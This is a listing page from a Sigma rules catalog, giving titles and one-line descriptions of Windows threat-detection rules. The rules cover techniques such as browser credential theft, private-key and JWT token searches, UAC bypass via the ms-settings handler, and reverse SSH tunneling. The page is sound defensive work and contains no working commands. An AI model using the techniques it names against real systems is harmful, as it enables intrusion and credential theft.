Sigma Rules
1,473 rules found
Potential Amazon SSM Agent Hijacking
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Start of NT Virtual DOS Machine
Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
User Added to Local Administrators Group
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
Execute From Alternate Data Streams
Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
Always Install Elevated Windows Installer
Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
Potentially Suspicious Windows App Activity
Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
Arbitrary Shell Command Execution Via Settingcontent-Ms
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Automated Collection Command Prompt
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Potential Suspicious Browser Launch From Document Reader Process
Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
Potential Commandline Obfuscation Using Escape Characters
Detects potential commandline obfuscation using known escape characters
Suspicious Usage of For Loop with Recursive Directory Search in CMD
Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing. This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection. This behavior has been observed in various malicious lnk files.
Potential Command Line Path Traversal Evasion Attempt
Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
Potential Browser Data Stealing
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Copy From Or To Admin Share Or Sysvol Folder
Detects a copy command or a copy utility execution to or from an Admin share or remote
Suspicious Copy From or To System Directory
Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
Always Install Elevated MSI Spawned Cmd And Powershell
Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
Suspicious Electron Application Child Processes
Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
Potentially Suspicious Electron Application CommandLine
Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
Elevated System Shell Spawned From Uncommon Parent Location
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
Hidden Powershell in Link File Pattern
Detects events that appear when a user click on a link file with a powershell command in it
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
Suspicious File Characteristics Due to Missing Fields
Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
Writing Of Malicious Files To The Fonts Folder
Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
Potential Homoglyph Attack Using Lookalike Characters
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
Potentially Suspicious JWT Token Search Via CLI
Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
LOLBIN Execution From Abnormal Drive
Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.
Potential File Download Via MS-AppInstaller Protocol Handler
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
Suspicious Scan Loop Network
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
Potential Network Sniffing Activity Using Network Tools
Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Process Launched Without Image Name
Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
Execution of Suspicious File Type Extension
Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.
Use Short Name Path in Image
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
Use NTFS Short Name in Command Line
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
Use NTFS Short Name in Image
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
Obfuscated IP Download Activity
Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
Obfuscated IP Via CLI
Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
Private Keys Reconnaissance Via CommandLine Tools
Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
Suspicious RunAs-Like Flag Combination
Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
Recon Information for Export with Command Prompt
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Registry Modification of MS-settings Protocol Handler
Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence. Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.
Potential Remote Desktop Tunneling
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
Shadow Copies Creation Using Operating Systems Utilities
Shadow Copies creation using operating systems utilities, possible credential access
Process Creation Using Sysnative Folder
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Suspicious SYSVOL Domain Group Policy Access
Detects Access to Domain Group Policies stored in SYSVOL
Malicious PE Execution by Microsoft Visual Studio Debugger
There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.
Suspicious Userinit Child Process
Detects a suspicious child process of userinit